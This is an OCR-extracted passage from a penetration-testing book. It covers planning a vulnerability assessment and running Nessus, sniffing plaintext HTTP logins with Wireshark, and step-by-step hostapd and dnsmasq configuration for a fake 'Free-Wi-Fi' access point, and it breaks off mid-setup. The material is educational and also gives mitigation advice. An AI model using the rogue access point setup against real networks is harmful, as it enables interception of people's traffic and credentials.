scanner with the most recent virus definitions. Staff members should receive security awareness 
training. 


Conclusion 


Wow! In this chapter, we accomplished three demonstrations! This chapter was a lot of fun and 
was also quite interesting. Let us look back at what you have learned so far. 


We addressed why it is critical to determine the number of live hosts while executing a network 
penetration test in this chapter. After that, we used Kali Linux to detect hosts on the network. 
Then, as a penetration tester, we demonstrated how to determine network size and why it is vital 
to know. We wrapped off the chapter by demonstrating how to use the Nessus vulnerability 
scanner to find vulnerabilities in Windows 7, as well as a list of possible mitigations. 


We will go over how to organize a vulnerability assessment, configure the Nessus vulnerability 
scanner, run the scanner, and patch vulnerabilities in the following chapter. Let us now get 
started on the upcoming chapter! 


uestions 


1. Mention the most famous network mapping tools. 

2. How do we determine the network size? 

3. How do we detect vulnerable hosts in your network in detail? 
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. What are the prevention methods to defend ourselves against attacks? 


CHAPTER 6 
Wireless Vulnerability Assessment 


Introduction 


We spoke about how to get on the network and find out who is on it in the previous chapter. In 
this chapter, we will look at vulnerability assessments, which raises the question: what exactly is 
a vulnerability assessment? 


A vulnerability assessment, also known as vulnerability analysis, is the process through which a 
security professional uncovers, identifies, and categorizes potential security vulnerabilities 
(holes) in a computer system, network, or other electronic infrastructure. Vulnerability 
assessments can also be used to evaluate threats and propose an appropriate countermeasure. 
When conducting vulnerability assessments, most security experts follow a step-by-step 
procedure. The following is a typical vulnerability assessment: 


e Identifying and categorizing computer systems and networks 
e Creating a list of the most critical services 

e Identifying each service’s possible security threats 

e Developing a defense strategy to counter potential threats 


e Finding measures to minimize or reduce risk in the event of an attack 


If a person or organization discovers a vulnerability, they are liable for it and must notify the 
vendor. A zero-day vulnerability is one that is discovered as a high-level threat without the 
vendor being notified. When a vulnerability is not addressed or patched by the developer, a zero- 
day attack will be prevalent. This is well-known when a vendor’s device or software is no longer 
supported. 


If the threat is modest, the vendor will most likely wait until the next update to release a patch. It 
all relies on the nature of the threat and what it is capable of. A vulnerability that allows remote 
executables or, worse, root or administrator rights without authorization should be patched as 
soon as possible; however, this is not always the case. It is contingent on how the vendor handles 
such a circumstance. It is possible that the organization will not be able to afford it. 


Vulnerability assessments are typically carried out by white hats or trained, ethical hackers; 
however, black hats will occasionally utilize them for malicious purposes. They can perform 
vulnerability assessments to learn more about what they can access through someone’s network. 
Security experts can uncover gaps and provide recommendations and countermeasures to prevent 
an attack using these approaches to access vulnerabilities. 


Structure 


In this chapter, we will discuss the following topics: 


e Planning an assessment 

e Setting up a vulnerability scanner 
e Running a vulnerability scanner 
e Running a Nessus 

e Generating reports 


e Resolving vulnerabilities 


Objectives 


In this chapter, you will be able to plan out an assessment, the key components of an assessment, 
and the step-by-step process of an assessment. You will be able to install Nessus, register it, 
downloaded plugins, and then run Nessus. You will be able to create a new policy and scan, 
identify vulnerabilities, read the vulnerability details, and follow it with a solution to the 
vulnerability. 


Planning an assessment 


We need to start planning an assessment before we can execute one. We begin by asking 
ourselves a series of questions about the evaluation. Let us get started! 


How we will be spending our time and resources? 


If you are going to conduct an assessment for an individual or a company, you will need an 
estimate of how long it will take to complete the task. It is also a good idea to know ahead of 
time what you will be using to complete the assessment. 


Do you have enough supporting evidence for your discoveries ? 


It is a good idea to double-check that you have adequate data to cover any findings you make 
throughout the vulnerability assessment. When you start generating reports, you need to know 
what each vulnerability is and how it operates. It is also a good idea to provide proof of concept. 


When a vulnerability is detected and identified, what is the best way to address the problem? 


This is a difficult question to answer because it is dependent on the severity of the threat. The 
most frequent things to do are to make sure you have the most recent updates, upgrade your 
software, turn off any background services that are not in use, and add any additional security 
features like complex passwords and two-factor authentication. Notify the vendor of the 
vulnerability. 


How can we improve the detection rate and minimize security threats ? 


Commercial hardware firewalls with IDS and IPS monitoring capabilities—proactive scanners 
that detect attacks on the go. Within their hardware firewalls and unified threat management 
systems, WatchGuard delivers great security modules such as packet filtering, intrusion 
prevention service, application control, Web blocker, gateway antivirus, spam blocker, and much 
more. To minimize risk, make sure your software and hardware are always up to date. 


An objective and a logical plan are required to conduct a good assessment. 


Components of a vulnerability assessment plan 


We will go through a few critical elements of a vulnerability assessment strategy. As an example, 
consider the following: 


e Primary objective: 


© How is this objective handled? 

© How will this objective be accessed? 

o Who is involved in the assessment? 

o Whose patches are available on the vendor side? 
o Identifying common vulnerabilities 


o Summarize 
e First objective: 

© Identifies the issues 
e Second objective: 

o Provide a temporary or permanent solution 
e Third, fourth, and so on: 


© Depending on the situation, it may require additional objectives. 


Planning the process of a vulnerability assessment 


We will look at an example of how to plan a vulnerability assessment in this section: 
e Objectives: 
o Are there any open networks available? If so, what are they used for? 
e Criteria: 
© What is the priority of this objective? 
e Strategy: 


o If there are unauthorized users on the network, can they cause damage to 
workstations or servers? 


o Are they ona separate VLAN or subnet? 
e Methods: 

o What can we do to meet the objective? 
e Time: 


o Js there a deadline? 


o When can we provide a solution? 
e Results: 


o Who will need to know about the results? 


o How can we prevent future unauthorized user access? 


This should give you a fair understanding of how to go about designing your own vulnerability 
analysis. When providing service to an individual or a business, use this as a guide. After that, 
we will build up a vulnerability scanner. Nessus is the vulnerability scanner we will be looking 
at. 


Before we begin setting up a vulnerability scanner, it is crucial to understand what a vulnerability 
scanner is and why it is so important. Vulnerability scanners do exactly what they say on the tin. 
It is a program or software security tool that looks for flaws in computers, devices, and networks. 
In most circumstances, it will immediately notify you whether you are facing low, medium, or 
severe security dangers. From the perspective of a security specialist, this can be highly useful in 
further analyzing what could potentially threaten an individual or company. 


By exploiting the given vulnerability, a black hat hacker might swiftly acquire unauthorized 
access to confidential information or company data if they use this tool. On a corporate network, 
the only way to protect against a vulnerability scanner is to divide each department into VLANs, 
enforce strong group policies that prevent untrusted executables and installations, limit the use of 
flash drives, and provide any form of protection against running unauthorized programs. 
Employees should only run products that help them complete their tasks; websites can swiftly 
shut down those users by enabling a URL blocker and adding security features. 


It is crucial to know what a vulnerability scanner is. This is because this tool may be extremely 
useful in determining what might be a backdoor to your system or perhaps your entire network if 
a hardware firewall has a service or port open that should not have been switched on in the first 
place. Firewall and router default settings are excellent because they just work, right? Wrong! It 
is critical to turn off any unused services and to block any ports that are not in use, such as FTP, 
RDP, SSH, and Telnet. 


Within Kali Linux, we will be using the Nessus vulnerability scanner. Tenable Network Security 
created Nessus, a proprietary comprehensive vulnerability scanner. They sell both personal and 
commercial software licenses. For demos, we will use the personal version. 


One of the most widely used vulnerability scanners is Nessus. It is currently used by over 80,000 
organizations all around the world. Nessus is a tool that automatically detects known security 
flaws. One of the best features of Nessus is that it can be used as both a client and a server. It can 
be networked, allowing scans to be performed from any location. Microsoft Windows, Mac OS 
X, Linux, FreeBSD, Solaris, and IBM/AIX are all supported. For penetration testers, the 
reporting feature is quite useful. 


The following will be detected by Nessus: 


e Vulnerabilities that provide remote access 
e Access to sensitive data on a system 
e Misconfigured systems (missing security patches, open ports, and so on) 


e Commonly used passwords, default passwords, and blank passwords 


e Denial of service attacks by using mangled packet 
e PCI DSS audits 


It will not only discover flaws but also give you information on the vulnerability and the severity 
of the danger. It will include connections to additional information and, if a security patch is 
available, links to download these security patches to help provide an extra layer of security. 


Setting up a vulnerability scanner 


Nessus will be the topic of this section. We will download and install Nessus, then register for an 
activation code, activate the program, and execute our first scan. 


Downloading Nessus 


Because Nessus is not preinstalled on Kali Linux, we will need to download and install it before 
we can begin searching for vulnerabilities. To get the most recent version of Nessus, go to the 
following website: https://www.tenable.com/downloads/nessus 


Select the download according to your operating system, as shown in Figure 6.1: 


+ 


@ tenable com 


Otenable Downloads 


Figure 6.1: Nessus download 


Installing Nessus 


We will deploy the Nessus vulnerability scanner in this demonstration. The steps are as follows: 


1. Open a Terminal. 


2. Enter the following command and press Enter: 
sudo dpkg -i Nessus-8.15.2-debian6_amd64.deb (For 64 bit OS) 
sudo dpkg -i Nessus-8.15.2-debian6_i386.deb (For 32 bit OS) 


Figure 6.2 is the output: 


/home/kali/Desktop/Nessus 
= 


Figure 6.2: Nessus Download_2 


3. Press Enter after entering the following command: 
sudo systemctl start nessusd.service 


The Nessus vulnerability scanning utility will be launched with this command, as shown 
in Figure 6.3: 


home/kali/Desktop/Nessus 
tart nos J ory 


home/kali/Desktop/Nessus 


home/kali/Desktop/Nessus 


Figure 6.3: Nessus start 


4. Navigate to https://127.0.0.1:8834 in a Web browser. 


5. Click Proceed anyhow when presented with the site’s security certificate. We will be 
present with a screen that is shown in Figure 6.4: 


Figure 6.4: Open Nessus in the Web browser 


6. You will be presented with the initialized screen for Nessus, as shown in Figure 6.5: 


(_)nessus 


Inmalizing 


Figure 6.5: Initialize Nessus 


7. Obtaining an Activation Code for Nessus Vulnerability Scanner 
Nessus Essentials and Nessus Professional are two different versions of enable’s Nessus 
Vulnerability Scanner. Nessus Essentials is free, although it has a limited feature set 
compared to Nessus Professional, which costs money. The following are some of the most 
significant limitations of Nessus Essentials: 
e Scanning is limited to 16 IP Addresses per scanner. 
e Compliance checks or live results are not available. 
e No ability to use the Nessus virtual appliance. 
Nessus Essentials will be used. Despite the fact that the software is free, it does require a 
valid activation code, which is detailed as follows. 
8. Navigate to the Nessus Essentials Product Portal. 
https://www.tenable.com/products/nessus/nessus-essentials 
9. Fill in your first name, last name, and e-mail address on the registration form, as shown in 
Figure 6.6: 


Register for an Activation Code 


First Name * Last Name * 
MyFirstName MyLastName 
Email * 


MyEmailAddress 


_) Check to receive updates from Tenable 


Figure 6.6: Tenable Nessus essentials product registration page 


10. To finish registration, click the Register button, as shown in Figure 6.7: 


Register for an Activation Code 


First Name * Last Name * 
MyFirstName MyLastName 
Email * 


MyEmailAddress 


_) Check to receive updates from Tenable 


Figure 6.7: Completing registration on the Tenable Nessus essentials product registration page 


11. Tenable will send you a confirmation e-mail once your registration is complete. Finally, 
you will be given the following message, as shown in Figure 6.8: 


Thank You for Registering for Nessus 


Essentials! 


Check Your Email for the Activation Code 


12, 


13. 


14. 


15. 


16. 


Figure 6.8: The Nessus Essentials product registration page showing the result of successful registration 


Check your e-mail for an activation code that looks something like D234-C7CB-04AF- 
79A6-1555. no-reply@tenable.com will be the e-mail sender’s address. If you do not see 
the registration e-mail in your inbox, then check your trash mail! 


Activating the Nessus Application: It is time to activate your Nessus installation now that 
you have gotten your activation code and started the Nessus service. 


Navigate to https: //localhost : 8834 using a Web browser on your Kali Linux operating 
system. It is important to note that the default port is 8834, not 443. (When you try to visit 
the Nessus application’s Web interface, you will probably get a warning because the 
installation comes with a self-signed SSL certificate. Tenable gives you the option of 
customizing the SSL certificate that your Nessus application uses.) 


Select Nessus essentials as the product version on the Welcome to Nessus screen, as 


(_)nessus 


Welcome to Nessus 


Choose how you want to deploy Nessus. Select a 
product to get started 


© Nessus Essentials 


Nessus Professional 


& 
@ Nessus Manager 
& 


Managed Scanner 


Figure 6.9: Selecting Nessus essentials as the Nessus product version 


You can skip the Get an activation code screen because you already have the 
activation. Refer to Figure 6.10: 


neSssus 


Essentials 


Get an activation code 


To receive an email with a free Nessus Essentials 
activation code, enter your information. 


If you already have an activation code, skip this 


step 


First * 


Figure 6.10: Selecting the skip button on the retrieve activation code screen 


17. On the Register Nessus screen, enter the Activation Code you obtained during the 
registration procedure and click Continue. The mock activation code for this tutorial is 
D234-C7CB-04AF-79A6-1555, as shown in Figure 6.11: 


nessus 


Essentials 


Register Nessus 


Enter your activation code 


Activation Code * 


D234-C7CB-04AF-79A6-1555 


HB Register Offline 


Figure 6.11: Entering the activation code into the Nessus application 


18. When the Create a user account screen appears, enter a username and password, then 
click Submit. The Nessus program is accessed using the given login and password, as 
shown in Figure 6.12: 


nessus 


Essentials 


Create a user account 


Create a Nessus administrator user account. Use 
this username and password to log in to Nessus. 


Username * 


Password * 


a 


Figure 6.12: Creating a user account for the Nessus application 


19. After the scanner has finished initializing, which may take some time, click Sign In and 
enter the username and password for the user account you created earlier in this lesson. 
Refer to Figure 6.13: 


nessus 


Essentials 


Mi Remember Me 


Figure 6.13: Displaying the username and password login screen 


Fantastic work! Your Nessus vulnerability scanner program is now installed and activated! In the 
next part, you will set up Nessus to run a vulnerability scan on your local system. 


Running a Nessus vulnerability scan 


You have successfully installed Nessus. It is time to put the pedal to the metal and discover what 
this useful tool can do for you in terms of finding weaknesses! The rest of this section will walk 
you through configuring and running a scan on your Kali Linux system. 


If you are still on the Nessus application screen or are not already logged in, enter the username 
and password for the user account you created earlier in this guide. 


A welcome message may appear upon the first login, allowing you to rapidly configure a 
discovery scan, which locates networked devices. You may dismiss this notice because you are 
about to configure and run a custom scan, as shown in Figure 6.14: 


Welcome to Nessus Essentials 


Targets 


Close 


Figure 6.14: The Nessus application showing the close selection button highlighted 


Configuring a scan can be done in a variety of ways. This tutorial focuses on the three-step 
process mentioned in the following sections. 

1. Configure a scan policy 

2. Configure a scan 


3. Launch the scan 


Configuring a Nessus vulnerability scan policy 


Scan policies are basically a set of scanning instructions. Scan policies tell the scanner what 
duties to complete and how to complete them. You can choose from several pre-configured scan 
policy templates or customize a complex scan. The scanning capabilities of Nessus are divided 
into three categories by Tenable: 


e Discovery scan: Targets address space to report on live hosts and open ports. 
e Vulnerability scan: Targets endpoints to assess for known vulnerabilities. 


e Compliance scan: Targets endpoints to assess endpoint configuration for compliance 
with a particular standard (for example, Centre for Internet Security (CIS) 
benchmarks, Security Technical Implementation Guide (STIG), and so on). 


Follow the following steps to build and configure your scan policy. 


1. Policies can be found under the Resources category in the menu on the left-hand side of 
the screen, as shown in Figure 6.15: 


@ My Scans 
@ AjllScans 


f} ‘Trash 


Plugin Rules 


Community 


Research 


Figure 6.15: Selecting policies from the Nessus menu 
2. Choose New Policy from the menu in the upper right corner of the screen, as shown in 


Figure 6.16: 


Figure 6.16: Creating a new policy from the Nessus policies page 


3. Select Basic Network Scan from the drop-down menu. Pre-configured settings for 
assessing your Kali Linux server for vulnerabilities are included in the Basic Network 
Scan option, as shown in Figure 6.17: 
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Figure 6.17: Selecting the basic network scan from the Nessus policy templates page 


Additional adjustable components appear after selecting a scan policy template. For the 
time being, leave each pre-configured setting in its default state, but feel free to 
experiment afterwards. 


4. Click the Save button after giving your scan policy a Name. Basic Network 
Vulnerability Scan Policy is the name of the scan policy used in this tutorial, as shown 


in Figure 6.18: 


Basic Network Vulnerability Scan Policy / Configuration 


« Back to Policies 
Settings Credentials Plugins 


BASIC v 


Name Basic Network Vulnerability Scan Policy 
DISCOVERY 


ASSESSMENT 
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REPORT 
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Figure 6.18: Entering the policy name and using pre-configured defaults on the Nessus Basic Network Vulnerability 
scan policy page 


Tenable requires administrative access to run vulnerability checks (some of which will be 
demonstrated in this tutorial). Executing a scan without credentials offers insight into externally 
enumerable vulnerabilities, simulating the perspective of an attacker. 


Configuring a Nessus vulnerability scan 


Configuring your scan is the next stage in the procedure. Select a scan policy and target host as 
stated as follows during this part of the process. 


1. From the menu on the left-hand side of the screen, select My Scans, as shown in Figure 
G75: 


@ My Scans 


@ All Scans 
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@ Policies 
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Research 


Figure 6.19: Selecting My Scans on the Nessus menu 


2. In the upper right-hand corner of the screen, click the New Scan button, as shown in 
Figure 6.20: 


Figure 6.20: Creating a New Scan in Nessus 


3. Select the newly created Basic Network Vulnerability Scan from the User Defined 
tab, as shown in Figure 6.21: 


Scan Templates 


< Back to Scans 


Scanner User Defined 


Host Discovery 


Figure 6.21: Choosing to create a User-Defined Nessus scan 


4. Choose the scan policy you set up in the previous section. The Basic Network 
Vulnerability Scan Policy from this lesson is displayed for selection, as shown in 


Figure 6.22: 
Scan Templates 


< Back to Scans 


Scanner User Defined 


Basic Network Vulnerability 
Scan Policy 


Figure 6.22: Selecting the Basic Network Vulnerability Scan Policy 


5. Define your goal(s). In the Targets text entry box, type localhost to target your local Kali 
Linux host, as shown in Figure 6.23: 


New Scan / Basic Network Vulnerability Scan Policy 
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Targets 


Upload Targets Add Fite 


aed 


Figure 6.23: Defining a vulnerability scan target 


Multiple targets can be defined in a single scan by separating them with a comma. 
Specifying localhost, 10.10.10.10, for example, will target your localhost and the 
10.10.10.10 IP address. 


6. Give your scan a name, and then click the Save button. The name of this tutorial’s scan is 
Basic Network Vulnerability Scan, as shown in Figure 6.24: 


New Scan / Basic Network Vulnerability Scan Policy 


¢« Back to Scan Templates 


Settings 
BASIC v 
Name 
General 
Schedule 
Description 
Notifications 
Folder My Scans - 
Targets localhost 
Upload Targets Add File 


Figure 6.24: Saving the new Nessus vulnerability scan 


Launching a Nessus vulnerability scan 


Create an entry in the My Scans section of the Nessus application after saving your scan. 
1. Click the Play button next to the Basic Network Vulnerability Scan to begin your 
scan, as shown in Figure 6.25: 


Figure 6.25: Playing a Nessus vulnerability scan 
2. The scanning is shown by the rotating green arrow indicator. Be patient as the scan takes 
some time to complete, as shown in Figure 6.26: 
My Seans . —- 
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Figure 6.26: Demonstrating that a rotating green arrow icon indicates a running scan 


3. The scan is complete when the rotating green arrow icon turns to a green checkmark. To 
see the results, simply click on the scan’s name! Refer to Figure 6.27: 
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Figure 6.27: Completing a vulnerability scan as indicated by the green checkmark 


Fantastic work! You have just completed a vulnerability scan on your Kali Linux host! On 
the scan summary page, click the Vulnerabilities tab to see the results, as shown in 


Figure 6.28: 


Figure 6.28: Displaying the found vulnerabilities on the scan summary page 


4. Click on one of the vulnerabilities. It will provide additional information, as shown in 
Figure 6.29: 


Figure 6.29: Displaying additional information on the vulnerabilities 


The report explains what vulnerability is and what it accomplishes. It will offer a solution along 
with references to more resources. For the ordinary user, this will provide you with all the 
information you need to figure out what is causing the problem, what the risks and threats are, 
and how to fix them. 


Creating reports will help you organize your work and provide you with a central location to 
analyze all your outputs and results during your penetration test. Reports are useful because they 
provide all the information in one place, eliminating the need to resort to another document. 


1. It is time to get the reports from our scan now that we have installed and executed it. Click 
Vulnerabilities, as shown in 


Figure 6.30: The vulnerabilities 


2. Click on Report, as shown in 


Report format * 


Select a Report Template 


Figure 6.31: Report 
3. Select the file format (PDF/HTML/CSV) and select a Report Template, then click on the 
Generate Report button (this will download the file format that you have chosen). 


4. Open the file to see whether it is in a viewable and working format, as shown in Figure 
bs: 
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Figure 6.32: Pdf report 


Congratulations, you have successfully generated a vulnerability report in Nessus! 


Resolving vulnerabilities 


Because hackers rarely target software vulnerabilities, they are less harmful than operating 
system flaws. Even so, some program flaws, such as those in Internet Explorer or Microsoft 
Office, can constitute a significant hazard. As soon as a patch is released, these vulnerabilities 
are routinely fixed through Windows updates. Microsoft Update, Windows Update, and Office 
Update all provide security upgrades. You may simply find them by searching for security 
update as a keyword. If Nessus has identified MSO7 036 as a vulnerability on your Windows 
system, for example, you can search for that security bulletin number and then download all 


available updates to patch your machine. When it comes to program vulnerabilities, you should 
always check for and download the most recent software upgrades as soon as they become 
available. 


Conclusion 


That is pretty much it for this chapter! We talked about how to start designing an assessment, the 
important components of an assessment, and the assessment’s step-by-step approach. Nessus was 
installed, registered, and plugins were downloaded before Nessus was run. We also built a new 
policy and scan, detected vulnerabilities, read the vulnerability details, and followed up with a 
fix. We will now move on to the next chapter, where you will learn about client-side attacks! 


uestions 


1. Mention the steps of installing the Nessus program. 
2. What are the differences between discovery scan and vulnerability scan? 


3. How to generate a report in the Nessus program? 


CHAPTER 7 
Client-side Attacks 


Introduction 


We reviewed how to do a network vulnerability assessment in the previous chapter. Client-side 
assaults will be covered in this chapter, which will help you understand how hackers might target 
and attack systems and other network devices. What is a client-side attack, exactly? Let us 
discuss this. 


Structure 


The following topics will be covered in this chapter: 


e How do client-side attacks work? 
e Types of client-side attacks 

e Sniffing unencrypted traffic 

e Honeypot attacking 

e Preventing threats 


Objectives 


In this chapter, you will learn how to capture unencrypted traffic and gain an understanding of 
honeypot attacks and methods, Karmetasploit, Jasager, and prevention from threats. 


How do client-side attacks work? 


To completely comprehend how a client-side assault operates, we must first examine how server- 
side attacks differ from client-side attacks. Clients connect with servers through a variety of apps 
and services, as shown in Figure 7.1. These server services are available to the client who has 
made the service available to them to try and exploit. A server becomes increasingly vulnerable 
to attacks as more services are launched on it: 


Malware Request 


i od 


Vulnerable Client Malware 


Malicious 
Server 


Figure 7.1: Client-side attacks 


Client-side attacks are distinct from server-side attacks. These attacks are designed to exploit 
flaws in client apps that interface with a hostile server. Because it does not process anything sent 
from a server, the client is not at risk if it is not connected to one. Because most clients are 
automatically configured to connect to the server, instant messaging applications can possibly 
expose a Client to attacks, as shown in Figure 7.2: 
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Figure 7.2: Client-side attacks scenario_1 


The most common client-side attacks are carried out when someone visits a malicious Web page 
that targets their Web browser application. If the attack is successful, the attacker could easily 
take control of the client. There are more attacks than just Web-based attacks, such as attacks via 
e-mail, instant messaging, and FTP, as shown in Figure 7.3: 
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Figure 7.3: Client-side attacks scenario_2 


Clients are only safeguarded when a defense is provided. Network traffic is restricted by 
firewalls and proxies to only trusted websites and servers. Packet filtering, intrusion prevention 
services, and application control are all included in hardware firewalls like WatchGuard’s XTM 
800 Series. All your systems and devices are at risk if you do not have a hardware firewall on 
your network as a business. 


Types of client-side attacks 


Client-side attacks take advantage of the user’s trust in the website or server they are visiting, as 
shown in Figure 7.4: 


Figure 7.4: Client-side attacks example 


The following are the most typical types of client-side attacks: 


e Spoofing: It is the act of convincing a user that a website or server is real. 


e Cross-site scripting (XSS): This allows an attacker to run code in the user’s browser. 
This attack can be used to hijack a user’s session, launch phishing attacks to steal login 
credentials, or even embarrass the user with explicit content. This vulnerability affects all 
online apps. An exploit will often execute on the user’s Web browser application using 
HTML, JavaScript, VBScript, ActiveX, Java, or Flash, as shown in Figure 7.5: 
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Figure 7.5: XSS Scenario 


Sniffing unencrypted traffic 


By now, you should be aware that unencrypted Wi-Fi communication can be accessed by 
anybody, putting your data at risk. Have you ever used a public wireless network, such as one 
provided by Starbucks or a hotel? Have you ever considered who else might be linked to your 
network and listening in on your communications? Is that not terrifying? 


It requires very little to no prior experience! Anyone may view unencrypted traffic with 
surprising ease. In this demonstration, let us see how to sniff your unencrypted communication in 
detail. This presentation will show why it is critical to always connect through a secure 
connection. 


1. Navigate to Applications | Sniffing & Spoofing | Wireshark, as shown in Figure 7.6: 


Q 01 
@y 02 
o) 
G04 
g 
@ 
fer! 
3 08 
€ 09 
iS 
© u 
Du 
8 
@ 


Figure 7.6: Wireshark application 


You can also open Wireshark by entering sudo wireshark in a terminal window. 
2. Figure 7.7 is how the Wireshark graphical interface should look: 
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Figure 7.7: Wireshark GUI 


3. Then, navigate to Capture | Options. .., as shown in : 
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Figure 7.8: Wireshark capture interfaces 


4. We have chosen ethO for this demonstration. For some of you, this may be wlan0 or 
wlan1. Check the box and click on Start, as shown in i 
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Figure 7.9: Wireshark eth0 interface 


5. You should see Wireshark beginning to capture network traffic, as shown in Figure 7.10: 
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Figure 7.10: Wireshark ethO interface packets 


6. In this demonstration, we will be filtering HTTP and press Enter, as shown in Figure 
#12! 


Figure 7.11: Wireshark HTTP filter 


7. Use the HTTP protocol on the browser to log in to the following website: 
http://testphp.vulnweb.com/login.php 
Refer to Figure 7.12: 
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Figure 7.12: Website login 


To log in, enter username test and password test. 


8. In Wireshark, you should see a lot of different HTTP paces: Right-click on one of them 
and select Follow, then TCP Stream, as shown in ‘ 
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Figure 7.13: HTTP follow the TCP stream 


9. It should display the HTTP request with the username and password in plain text, as 
shown in Figur i 
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Figure 7.14: HTTP request 


You must use the HTTPS protocol to make this connection safe and for a different connection, 
such as telnet. SSH-2 is the only option. SSH-1 has security flaws and is vulnerable to man-in- 
the-middle attacks. SSH-1 is no longer supported and should be avoided at all costs. Make sure 
your sshd config file is up to date, that you have changed the default SSH port, that you have 
limited users’ SSH access, that you have configured the IDL logout timeout interval, that you 
have disabled root login, and that you have set a warning banner based on your legal terms and 
legal notice details. Passwords and passwords for SSH should be strong. One cannot emphasize 
how critical this is. 


Honeypot attacking 


Wireless networks are becoming significantly larger in terms of bandwidth and range as 
technology advances. A wireless honeypot can be simply set up by a hacker to entice victims 
into what they assume is a secure wireless network. What is a wireless honeypot, and how does it 
work? A wireless honeypot is a device that is set up as an access point that has the same SSID 
as another access point in the area, as well as a proxy set up to point to the attacker’s computer. 


If a user connects to a honeypot, the attacker can filter or monitor all their network activity, 
potentially resulting in a man-in-the-middle attack. Any unencrypted traffic within that 
connection, such as e-mail, instant messaging, FTP, and telnet sessions, would be visible to the 
attacker. Refer to Figure 7.15: 
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Figure 7.15: Unencrypted connection 


The client is more than likely to view the attacker’s high-power gain antenna at the top of the 
wireless list for available wireless networks if the attacker has one. Another thing to keep in 
mind is that most Microsoft Windows operating systems are set up to connect to a wireless 
network automatically, which might be problematic if a honeypot with an identical SSID and 
password is nearby. This feature can be turned off. 


Protecting yourself from a honeypot or man-in-the-middle attack 


Simply not using wireless is one of the simplest methods to defend yourself from a honeypot 


attack, as shown in Figure 7.16. What if your company requires wireless access? Profiles should 
be created on BYOD devices to allow only trusted wireless networks to connect to the client’s 
devices. Use a 3G/4G or wired connection. What if you still require wireless access? Wireless 
Intrusion Prevention Systems (WIPS) can detect rogue access points using both software and 
hardware: 
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Figure 7.16: Man in the middle attack 


The SSID, channel, signal strength, and MAC address are used by WIPS to identify these access 
points. There is a probability that the AP is a honeypot if the criteria do not match. What happens 
if the hacker uses the same SSID and channel as you? The signal strength will then be used by 
the WIPS. The signal intensity can help establish whether an AP is real. 


KFSensor is a honeypot intrusion detection system (IDS) for Windows. It works as a 
honeypot, attracting and detecting hackers, worms, rogues, and flaws. It can deflect attacks by 
functioning as a decoy, adding an extra layer of defense. The KFSensor Interface is shown in 


Figure 7.17: 
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Figure 7.17: KFSensor interface 


You can download a 30-day trial from http://www.keyfocus.net/kfsensor/download/. 


Untrusted Wi-Fi networks, as you may know, can be quite harmful if you join them. If you are in 
a strange place and happen to be connected to an open network, your data will be visible to the 
person in charge of the access point, regardless of what device you are using. Not only that but 
also by hooking you up with a malicious Web page or a backdoor, the person in charge can have 
complete control over your device. 


There are numerous ways to accomplish this. You can send the connected user to a malicious 
website that you control and use to hook their devices. Using python MITM scripts on connected 
devices, you can also run and execute backdoors. Without appearing suspicious, you can even 
replace the download files that the connected users request on the fly. 


Let us look at how to start a fake AP: 


1. First, we will need to update on Linux to the latest version and install the required 
packages, as shown in 
apt-get update 
apt-get install hostapd dnsmasq apache2 


Figure 7.18: Packages installing 


2. We need to put the wireless card in monitor mode to allow us to _ the packets in and 


around the network. You can use the method shown in 
ifconfig wlan® down 

iwconfig wlanO mode monitor 

ifconfig wlanO up 


Figure 7.19: Wireless card settings 


3. Or if that did not work, you can use the method shown in Figure 7.20: 
airmon-ng start wlano 


Figure 7.20: airmon-ng command 


4. To make things organized and easier to work with, we will make a new directory in root 
and call it fap or a fake access point. Refer to Figure 7.21: 
mkdir /root/fap 
cd /root/fap 


Figure 7.21; mkdir command 


5. Once we are in the/root/fap that we created, we will now set up a new hostapd 
configuration file and write instructions inside, as shown in Figure 7.22. Hostapd (Host 
access point daemon) is a software access point that lets the user use his/her wireless 
adapter to broadcast several access points at the same time. 

nano hostapd.conf 
nano: is a command-line text editor included in most Linux installations. 
hostapd.conf: is the name of the configuration file that we created. 


Now, inside hostapd.conf, we need to set up instruction orders for it: 
inter face=wlan0 
driver=n180211 
ssid=Free-Wi-Fi 
hw_mode=g 
channel=1 
macaddr_ac1l=0 
ignore_broadcast_ssid=0 


After writing these instructions, press Ctrl + X, then Y, and then Enter. Now, we are all set 
for hostapd. conf. 

e interface: The name of the wireless adapter that we are using in monitor mode. 

e driver: The supported driver for hostapd. 

e ssid: The broadcasted Wi-Fi name. 

¢ hw_mode=g: Simply instruct it to use the 2.4 GHz band. 


e channel: The channel number to use for the fake access point. 


e macaddr_ac1=0: Tells hostapd not to use MAC filtering. [macaddr_acl=1] tells it to 
use MAC filtering. 


e ignore_broadcast_ssid=0: To make the fake access point visible and not hidden. 


Refer to Figure 7.22: 


Figure 7.22: Nano command 


6. Start the fake access point by doing: 
hostapd hostapd.conf 


You will notice that our access point will appear as an open Wi-Fi network. Now, open a 
new terminal window without closing the previous one. In the new terminal window, 
navigate back to the fap directory by doing the following: 

cd /root/fap 


Refer to Figure 7.23: 


®@ ~/fap 
hostapd.conf 


Configuration file: hostapd.conf 


Using interface wlanO with hwaddr f2:0d:f0:55:ff:56 and ssid “Free-Wi-Fi'" 
wlan®: interface state UNINITIALIZED->ENABLED 
wlan®: AP-ENABLED 


Figure 7.23: hostapd command 


7. We will be using dnsmasq for this step. Dnsmasq is a Dynamic Host Configuration 
Protocol (DHCP) server that is used to resolve DNS requests from or to a machine and 
also acts as a DHCP server to allocate IP addresses to the clients. It is fast and serves a 
great purpose that fits our needs. We will create a configuration file for dnsmasq and put 
some instructions in it, just like what we did previously with hostapd. To create the file: 

nano dnsmasq.conf 


Add these instructions inside: 
interface=wlano 


dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h 
dhcp-option=3, 192.168.1.1 

dhcp-option=6, 192.168.1.1 

server=8.8.8.8 

log-queries 

log-dhcp 

listen-address=127.0.0.1 


dhcp-range: IP address range for the connected network clients. 12h is the number 
of hours until the lease expires. 


dhcp-option=3: Gateway IP for the networks. 

dhcp-option=6: For DNS Server followed by IP address 

server: DNS server’s address 

log-queries: Log the results of DNS queries handled by dnsmasq. 


log-dhcp: Log all the options sent to DHCP clients and the tags used to determine 
them. 


listen-address: Links the DHCP to the local IP address, which is 127.0.0.1. 


Press Ctrl + X, then Y, and then Enter. Now, we are all set for dnsmasq.conf. Refer to 
Figure 7.24: 


8. Now, 


root @kali: ~/fap 
File Actions Edit View Help 
root@kali: ~/fap * root@kali:~/fap * 


interface=wland 

dhcp-range=#192.168.1.2, 192.168.1.30, 255.255.255.060, 12h 
dhcp-option=3, 192.168.1.1 

dhcp-option=6, 192.168.1.1 

server=8.8.8.8 

log-queries 

log-dhcp 

Listen-address=127.0.0.1 


me Help © Write Out @% Where Is as Cut oi Execute 
